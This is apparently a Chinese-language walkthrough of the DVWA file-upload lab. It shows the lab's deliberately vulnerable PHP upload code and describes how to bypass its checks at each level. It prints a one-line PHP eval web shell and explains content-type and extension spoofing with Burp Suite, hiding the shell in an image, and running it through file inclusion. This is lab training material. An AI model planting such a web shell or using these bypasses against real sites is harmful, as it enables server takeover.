Low
File Upload Source
vulnerabilities/upload/source/low.php
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
可以看到 服务端和客户端都没有做任何的检查,我们可以直接上传任何文件
这里我们上传一个一句话木马 shell.php
<?php
@eval($_POST['shell']);
?>
通过蚁剑连接成功
Medium
客户端对上传的文件类型进行了检查,必须为图像格式
方法一:
我们可以使用brupsuite进行抓捕来修改上传文件的content-type来绕过检查
上传成功,我们用蚂剑进行连接
方法二:
我们可以先上传一个写了一句话木马的图片,通过brupsuite抓包来修改上传文件的后缀名,这样也能绕过检查并且可以连接上蚁剑。
High
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
上传文件后缀名必须为图像格式并且使用了getimagesize()检查是否上传的为图片
使用 copy xxx.php/a + xxx.jpg/b xxx.jpg 将图片和上传木马结合起来
但这样我们不能连接到蚁剑上,因为上传文件识别出来为图片格式
我们可是使用文件包含漏洞,让服务端认为是php文件
蚁剑连接成功